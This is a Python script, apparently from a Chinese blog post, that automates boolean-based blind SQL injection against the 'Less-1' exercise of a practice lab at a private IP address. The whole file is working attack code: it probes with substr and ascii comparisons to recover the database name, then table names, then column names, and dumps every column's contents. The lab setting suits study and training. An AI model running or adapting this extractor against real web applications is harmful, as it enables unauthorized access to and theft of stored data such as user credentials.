import http.client
import re
#网页的连接、GET请求、以及判断页面是否报错。
def sql_inject(url):
# print(url)
con=http.client.HTTPConnection('192.168.100.200:8004')
con.request('GET',url)
# time.sleep(1)
html=resp=con.getresponse().read().decode()
# print(html)
li=re.findall(">Your Login name:(.*?)<br>Your Password:Dumb</font>",html)
# print(li)
if len(li)!=0:
# print(li)
if li[0]=="Dumb":
return True
else:
return False
#获取数据长度(数据库长度、表长度、列名的长度,没有判断为空的情况)
def get_length(url,sql):
length = 1
while True:
url1 =url+f"1%27and%20length%20(({sql}))=%27{length}%27%20%20--+"
# print(url1)
b=sql_inject(url1)
if b:
return length
else:
length+=1
#获取数据库名字
def get_dbname(url):
dbname=""
template="abcdefghijklmnopqsrtuvwxyz"
length=get_length(url,"database()")
# print(length)
for i in range(1,length+1):
for j in template:
url1 =url+f"1%27and%20substr(database(),{i},1)='{j}'%20%20%20--+"
b=sql_inject(url1)
if b:
dbname+=j
break
return dbname
#获取表名
def get_table_name(url,dbname):
tablename=''
template = ",abcdefghijklmnopqsrtuvwxyz"
sql =f"SELECT%20GROUP_CONCAT(TABLE_NAME)%20FROM%20information_schema.TABLES%20WHERE%20TABLE_SCHEMA=%27{dbname}%27"
length=get_length(url,sql)
# print(length)
for i in range(1,length+1):
for j in template:
url1 = url + f"1%27+and+substr(({sql}),{i},1)=%27{j}%27--+"
b=sql_inject(url1)
if b:
tablename+=j
break
return tablename
#获取列名
def get_column_name(url,dbname,tablename):
column=''
template = ",_abcdefghijklmnopqsrtuvwxyz"
sql = f"SELECT%20GROUP_CONCAT(COLUMN_NAME)%20FROM%20information_schema.COLUMNS%20WHERE%20TABLE_SCHEMA%20=%27{dbname}%27and%20TABLE_NAME=%27{tablename}%27"
length=get_length(url,sql)
# print(length)
for i in range(1,length+1):
for j in template:
url1 = url + f"1%27+and+substr(({sql}),{i},1)=%27{j}%27--+"
# print(url1)
b=sql_inject(url1)
if b:
column+=j
break
return column
#使用ascii码查找内容、形参dbname并没有用到
def content_all(url,tablename,column,dbname):
content=''
# print(url,tablename,column)
sql = f"SELECT%20GROUP_CONCAT({column})%20FROM%20{tablename}"
# print(sql)
length=get_length2(url,sql)
if length==0:
return content
else:
for i in range(1,length+1):
# print(length)
for j in range(0,121):
url1 = url + f"1%27+and+ascii(substr(({sql}),{i},1))=%27{j}%27--+"
# print(url1)
b=sql_inject(url1)
if b:
content+=chr(j)
# print(content)
break
return content
#查找内容长度,判断是否为空
def get_length2(url,sql):
length = 0
while True:
url2 = url + f"1%27and%20(({sql}))%20IS%20NULL%20--+"
# print(url2)
b = sql_inject(url2)
if b:
return '列表内容为空'
url1 =url+f"1%27and%20length%20(({sql}))=%27{length}%27%20%20--+"
# print(url1)
b=sql_inject(url1)
if b:
return length
else:
length+=1
if __name__ == '__main__':
# cookie, token = get_homepage('/Less-1/')
url="/Less-1/?id="
dbname=get_dbname(url,)
print('库名:',dbname)
f=get_table_name(url,dbname,)
# print(f)
s=f.split(',')
print('表名:',s)
for i in range(len(s)):
a=s[i]
c=get_column_name(url,dbname,s[i])
print(f'表{s[i]}中列名有',c,sep=':')
co=c.split(',')
for i in range(0,len(co)):
print(co[i])
f=co[i]
content=content_all(url,a,f,dbname)
print(content)
Less-1 python
最新推荐文章于 2024-10-14 14:50:26 发布